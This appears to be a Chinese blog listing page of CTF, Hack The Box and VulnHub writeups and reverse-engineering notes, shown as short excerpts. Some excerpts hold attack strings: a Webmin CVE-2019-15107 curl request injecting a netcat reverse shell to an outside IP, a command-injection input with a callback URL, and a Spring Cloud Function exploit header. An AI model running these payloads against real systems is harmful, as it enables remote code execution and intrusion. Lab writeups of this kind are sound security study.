自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(126)
  • 资源 (2)
  • 收藏
  • 关注

原创 BUUCTF-MD5

注意:得到的 flag 请包上 flag{} 提交。

2024-04-04 15:40:32 141

原创 # #一眼就解密

BUUCTF。

2024-04-04 15:09:04 168

原创 htb-cozyhosting

https://app.hackthebox.com/machines/CozyHostingFind. sessionshttp://cozyhosting.htb/actuator/sessionsF0FD1F42518BC0B9959B98BED562DC79 “kanderson”Using this sessionidwe can login in. As kandersonkanderson%20||%20whoami;‘id’http://10.10.16.51:5555/1@1man

2023-10-02 11:47:26 451

原创 攻防世界-web-ics-05

其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。77最佳Writeup由 darkless 提供。GFSJ0332积分 3金币 3。Click 设备维护中心。题目来源: XCTF。

2023-09-17 21:39:42 251

原创 adworld-web2

web2

2023-09-10 23:31:54 505

原创 OD动调之脱壳:使用ESP定律寻找

using ODUntil stopBlock!then F9!Jmp -> oep401171。

2023-09-03 22:06:36 132

原创 OD介绍及基本操作 so hard!

【代码】OD介绍及基本操作 so hard!

2023-08-06 23:08:21 176

原创 https://app.hackthebox.com/machines/Sau

【代码】https://app.hackthebox.com/machines/Sau。

2023-07-30 22:08:13 951

原创 Objdump-a god like tool on linux

【代码】Objdump-a god like tool on linux。

2023-07-23 18:39:47 66

原创 Radare2:using test

【代码】Radare2:using test。

2023-07-23 16:34:20 312

原创 # 逆向神器:Ghidra简介及使用方法

【代码】# 逆向神器:Ghidra简介及使用方法。

2023-07-16 21:21:12 1121

原创 2.2-base-num-str

【代码】2.2-base-num-str。

2023-07-09 09:47:12 133

原创 INFO BRAINPAN: 1

INFO BRAINPAN: 1About Release​​Back to the Top​​• Name: Brainpan: 1• Date release: 20 Mar 2013• Author: ​​superkojiman​​• Series: ​​Brainpan​​• Web page: ​​http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html​​Download​​Back to the

2023-07-08 23:45:22 200

原创 Python全栈开发工程师 第一模块作业

1.【编程题】100分第一模块作业:1- 学习计算机运行原理,绘制一张python代码从输入电脑,到处理,到输出结果的整个流程图2- 构建自己的python编程环境,整个过程做笔记,把截图放到word里提交3- 写下自己学习编程的目标(建议按月写,至少写出前三个月的,比如学到哪个模块或者做个什么小程序,我们都在盼着你的进步哦!要求与提示:1- 流程图建议手绘,简单线框图就好。如果用计算机画可以考虑用processon在线平台或visio或xmind或其他。

2023-07-08 23:42:56 205

原创 SAR: 1 4 https://www.vulnhub.com/entry/sar-1%2C425/

【代码】SAR: 1 4 https://www.vulnhub.com/entry/sar-1%2C425/

2023-07-08 23:25:15 344

原创 Python全栈开发工程师 第一模块作业

1.【编程题】100分第一模块作业:1- 学习计算机运行原理,绘制一张python代码从输入电脑,到处理,到输出结果的整个流程图2- 构建自己的python编程环境,整个过程做笔记,把截图放到word里提交3- 写下自己学习编程的目标(建议按月写,至少写出前三个月的,比如学到哪个模块或者做个什么小程序,我们都在盼着你的进步哦!要求与提示:1- 流程图建议手绘,简单线框图就好。如果用计算机画可以考虑用processon在线平台或visio或xmind或其他。

2023-06-11 12:01:39 627

原创 adworld-Guess-the-Number

Guess-the-Number

2023-05-16 22:49:28 87

原创 攻防世界- lucknum

2最佳Writeup由 toker 提供。方向:Reverse。

2023-04-19 23:46:26 177

原创 攻防世界-Reversing-x64Elf-100

18最佳Writeup由 yuchouxuan 提供反馈难度:1方向:Reverse题解数:15解出人数:2460题目来源:题目描述: 暂无。

2023-04-19 23:45:10 589

原创 https://app.hackthebox.com/machines/Squashed

【代码】攻防世界-level0。

2023-04-09 10:07:27 6809

原创 攻防世界-level2

【代码】攻防世界-level0。

2023-04-08 15:55:27 249

原创 攻防世界-level0

【代码】攻防世界-level0。

2023-04-05 10:07:21 259

原创 hello_pwn-adworld

hello_pwn

2023-04-05 09:50:50 192

原创 Pwn-get_shell-adworld!

题目详情WriteUP上一题下一题随机一题。

2023-04-05 09:39:42 87

原创 gcc hello 123

【代码】gcc hello 123。

2023-04-03 23:07:22 56

转载 # repeater-攻防世界

评论和私信会在第一时间回复。或者我。本博客所有文章除特别声明外,均采用许可协议。转载请注明出处!如果您觉得文章对您有帮助,可以点击文章右下角**【推荐】**一下。

2023-04-01 20:57:55 282

原创 pwnstack-攻防世界

【代码】pwnstack-攻防世界。

2023-04-01 19:06:58 501

原创 # 学习笔记**一道入门级别的栈溢出pwn题环境搭建**

参考:http://cn-sec.com/archives/632579.html。

2023-04-01 17:22:11 101

原创 看雪学习笔记-[原创]基于Metasploit的Exploit开发

看雪学习笔记-[原创]基于Metasploit的Exploit开发。

2023-04-01 11:01:30 188

原创 https://app.hackthebox.com/machines/Inject

Ref:1.https://blog.csdn.net/qq_58869808/article/details/1295053882.https://blog.csdn.net/m0_73998094/article/details/129474782browser itwe cant find exploit on the blogPOST /functionRouter HTTP/1.1Host: 127.0.0.1spring.cloud.function.routing-expressi

2023-03-30 20:43:24 1735

原创 看雪学习笔记-[原创]EXP编写学习 之 栈溢出(一)

【代码】看雪学习笔记-[原创]EXP编写学习 之 栈溢出(一)

2023-03-29 11:57:45 232

原创 看雪学习笔记-[原创]编写第一个Exploit

学习:source=1定位到了,EIP的地址为偏移的485个。

2023-03-28 16:08:47 309

原创 WEB:Wife_wife

get flag参考:https://www.rstk.cn/news/25963.html?

2023-03-22 19:52:04 2525

原创 https://app.hackthebox.com/machines/Soccer

【代码】https://app.hackthebox.com/machines/Soccer。

2023-03-19 15:45:34 32805 2

原创 https://app.hackthebox.com/machines/Stocker 20230227

【代码】https://app.hackthebox.com/machines/Stocker 20230227。

2023-02-27 22:52:01 1805

原创 MacOS set MarkText and PicGo

(

2023-02-25 21:54:55 164 1

原创 NEZUKO: 1——202201152003

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 192.168.219.177 4444&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content

2023-01-24 15:20:45 2393

原创 adworld-web-inget-20221226

题目来源: 宜兴网信办题目描述:无______||[(]|||__,|||[!

2022-12-26 13:52:11 836

原创 [~/vulhub]/log4j/CVE-2021-44228-20221225

┌──(kwkl㉿kwkl)-[~/vulhub/log4j/CVE-2021-44228]└─$ cat docker-compose.ymlversion: ‘2’services:solr:image: vulhub/solr:8.11.0ports:┌──(kwkl㉿kwkl)-[~/vulhub/log4j/CVE-2021-44228]└─$http://localhost:8983/solr/#/~logginghttp://localhost:8983/solr/admin/c

2022-12-25 22:04:37 467

原创 GOLDENEYE: 1-vulnhub-20221224

邮件传输包括将邮件从发送者客户端发往邮件服务器,以及接收者从邮件服务器将邮件取回到接收者客户端。7)客户端使用RCPT命令发送邮件接收者地址,如果SMTP服务器能识别这个地址,就向客户端发送OK命令,否则拒绝这个请求;4)客户端向SMTP服务器传送账号和密码,如果验证成功,向客户端发送一个OK命令,表示可以开始报文传输;6)客户端使用RETR命令接收邮件,接收一封后便使用DELE命令将邮件服务器中的邮件置为删除状态;7)客户端发送QUIT命令,邮件服务器将将置为删除标志的邮件删除,连接结束。

2022-12-24 22:21:44 2431

OD动调之脱壳:使用ESP定律寻找

mazeupx 测试程序

2023-09-03

OD介绍及基本操作 so hard!

#include <iostream> #include <Windows.h> #include <tlhelp32.h> int main() { int b; int a = 123; scanf_s("%d", &b); if (b==a) { MessageBoxA(NULL, "回答正确!","回答正确!",MB_OK); } else { MessageBoxA(NULL, "回答错误!", "回答错误!", MB_OK); } }

2023-08-06

Radare2:using test

Radare2:using test

2023-07-23

# 逆向神器:Ghidra简介及使用方法![image-20230709181455065](https://image-z

# 逆向神器:Ghidra简介及使用方法 ![image-20230709181455065](https://image-z

2023-07-16

Cracker01_pack_sign.apk 逆向学习资源

Cracker01_pack_sign.apk 安卓逆向学习资源

2022-03-29

LAMPSECURITY CTF6.pdf

## LAMPSECURITY: CTF6 - ### About Release [Back to the Top](https://www.vulnhub.com/entry/lampsecurity-ctf6,85/#top) - **Name**: LAMPSecurity: CTF6 - **Date release**: 29 Jun 2009 - **Author**: [madirish2600](https://www.vulnhub.com/author/madirish2600,75/) - **Series**: [LAMPSecurity](https://www.vulnhub.com/series/lampsecurity,43/) - **Web page**: [http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/CTF6/](https://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/CTF6/) ### Download [Back to the Top](https://www.vulnhub.com/entry/lampsecurity-ctf6,85/#top) Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!

2021-12-26

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除